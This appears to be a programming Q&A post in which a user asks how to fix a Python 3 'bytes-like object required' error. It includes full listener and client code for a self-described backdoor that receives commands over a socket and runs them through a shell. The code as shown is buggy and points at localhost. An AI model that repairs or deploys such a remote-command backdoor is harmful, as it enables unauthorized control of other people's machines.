# Socket Serialization Error , a bytes-like object is required, not 'str'

Tags: arrays, sockets, serialization, python-3.9

I tried Encoding but is not working can anyone help me with the serialization in python3 `a bytes-like object is required, not 'str'`

```
#!/usr/bin/python3

import socket
import json
import pickle


class Listener:

    def __init__(self,ip,port):
        listener = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
        listener.bind((ip,port))
        listener.listen(0)
        print("[+] Waiting for Incoming Connection")
        self.connection,address = listener.accept()
        print(("[+] Got a Connection from " + str(address)))

    def serialize_send(self, data):
        data_send = json.dumps(data)
        return self.connection.send(data_send)

    def serialize_receive(self):
        json_dataX = ""
        while True:
            try:
                # #json_data = json_data + self.connection.recv(1024)
                # data = self.connection.recv(1024).decode("utf-8", errors="ignore")
                # json_data = json_data + data 
                # return json.loads(json_data)

                json_data = bytes(json_dataX, 'utf-8')+ self.connection.recv(1024)
                return json.loads(json.loads(json_data.decode('utf8')))
            except ValueError:
                continue

    def execute_remotely(self,command):
        self.serialize_send(command)
        if command[0] == "exit":
            self.connection.close()
            exit()
        return self.serialize_receive()


    def run(self):
        while True:
            comX = input(">> : ")
            command = comX.split(" ")
            try:
                sys_command = str(command[0])
                result = self.execute_remotely(sys_command)
                    
            except Exception as errorX:
                result = errorX
            print(result)   

my_backdoor = Listener("localhost",1234)
my_backdoor.run()
```

Client Code

```
#!/usr/bin/python3

import socket
import subprocess
import json 
import pickle


class Backdoor:

    def __init__(self,ip,port):
        self.connection=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.connection.connect(("localhost",1234))

    def serialize_send(self,data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def serialize_receive(self):
        json_dataX = ""
        while True:
            try:
                #conn_Recv = self.connection.recv(1024)
                #data = self.connection.recv(1024).decode("utf-8", errors="ignore")
                #json_data = json_dataX + data 

                json_data = bytes(json_dataX, 'utf-8') + self.connection.recv(1024)
                return json.loads(json.loads(json_data.decode('utf8')))
            except ValueError:
                continue

    def execute_system_commmand(self,command):
        return subprocess.check_output(command,shell=True)

    def run(self):
        while True:
            commandx = self.serialize_receive()
            command = commandx
            try:
                if command[0] == "exit":
                    self.connection.close()
                    exit()
                else:
                    command_result = self.execute_system_commmand(command)

            except Exception:
                command_result = "[-] Unknown Execution."
            self.serialize_send(command_result)

my_backdoor = Backdoor("localhost",1234)
my_backdoor.run()
```

Comment: Try not to scream at people here, that's rude. Choose smaller fonts, and don't use ALL CAPS.

Comment: @FulPlan - You _tried Encoding_ - how?

Comment: I tried encoding the strings and data before sending it and decode at the receive function